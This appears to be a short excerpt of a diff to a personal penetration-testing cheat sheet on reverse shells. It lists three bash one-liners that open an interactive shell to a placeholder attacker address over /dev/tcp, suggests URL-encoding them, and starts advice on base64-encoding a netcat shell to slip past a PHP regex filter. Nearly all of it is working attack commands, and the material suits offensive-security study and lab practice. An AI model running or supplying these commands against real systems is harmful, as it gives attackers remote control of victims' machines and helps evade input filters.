gitblanc/c1b3rn0t3s/content/notes/reverse_shells.md

 bash -i >& /dev/tcp/ IP_ATTACK/4444 0>&1
 bash -c 'bash -i >& /dev/tcp/IP_ATTACK/666 0>&1'
 /bin/bash "/bin/bash -i 5<> /dev/tcp/IP_ATTACK/4444 0<&5 1>&5 2>&5"
+# or URL Encode the previous ones using CyberChef
 ```

 - Also, if the php script has a regex, you can encode to base64 a netcat shell like: